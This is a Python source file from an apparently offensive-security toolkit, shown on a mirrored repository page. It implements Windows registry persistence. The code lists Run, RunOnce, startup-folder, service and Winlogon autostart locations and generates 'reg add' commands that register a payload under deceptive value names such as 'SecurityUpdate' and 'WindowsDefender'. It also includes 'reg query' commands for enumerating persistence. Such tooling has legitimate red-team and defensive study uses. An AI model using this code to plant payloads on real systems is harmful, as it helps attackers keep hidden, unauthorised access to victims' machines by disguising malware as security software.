CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-02-12 14:02:45 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
main
NeuroSploit/tools/persistence/registry_persistence.py
Joas A Santos 35622198d5 Add files via upload
2026-01-01 19:26:00 -03:00

126 lines
4.6 KiB
Python
Raw Permalink Blame History

#!/usr/bin/env python3
"""
Registry Persistence - Windows persistence via registry keys
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class RegistryPersistence:
"""
Windows registry-based persistence techniques.
"""
def __init__(self, config: Dict):
"""
Initializes RegistryPersistence module.
Args:
config (Dict): Configuration dictionary
"""
self.config = config
logger.info("RegistryPersistence module initialized")
def get_persistence_keys(self) -> Dict:
"""
Get common Windows registry keys for persistence.
Returns:
Dict: Registry persistence locations
"""
persistence_keys = {
"run_keys": {
"HKCU_Run": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
"HKLM_Run": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
"HKCU_RunOnce": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
"HKLM_RunOnce": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
},
"startup_folders": {
"user_startup": r"C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
"all_users_startup": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
},
"services": {
"services_key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
},
"winlogon": {
"userinit": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
"shell": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
}
}
logger.info("Retrieved Windows persistence registry keys")
return persistence_keys
def generate_registry_command(self, key_path: str, value_name: str, value_data: str) -> str:
"""
Generate registry modification command.
Args:
key_path (str): Registry key path
value_name (str): Value name
value_data (str): Value data
Returns:
str: REG ADD command
"""
cmd = f'reg add "{key_path}" /v "{value_name}" /t REG_SZ /d "{value_data}" /f'
logger.info(f"Generated registry command: {cmd}")
return cmd
def generate_persistence_payload(self, payload_path: str, method: str = "run_key") -> Dict:
"""
Generate persistence payload using registry.
Args:
payload_path (str): Path to payload executable
method (str): Persistence method (run_key, service, winlogon)
Returns:
Dict: Persistence configuration
"""
methods = {
"run_key": {
"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
"value": "SecurityUpdate",
"command": self.generate_registry_command(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
"SecurityUpdate",
payload_path
)
},
"run_key_system": {
"key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
"value": "WindowsDefender",
"command": self.generate_registry_command(
r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
"WindowsDefender",
payload_path
),
"requires": "Administrator privileges"
}
}
result = methods.get(method, methods["run_key"])
result["payload_path"] = payload_path
result["method"] = method
return result
def get_enumeration_commands(self) -> List[str]:
"""
Get commands to enumerate existing persistence mechanisms.
Returns:
List[str]: Registry query commands
"""
commands = [
r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"',
r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'
]
logger.info("Generated registry enumeration commands")
return commands
Reference in New Issue View Git Blame Copy Permalink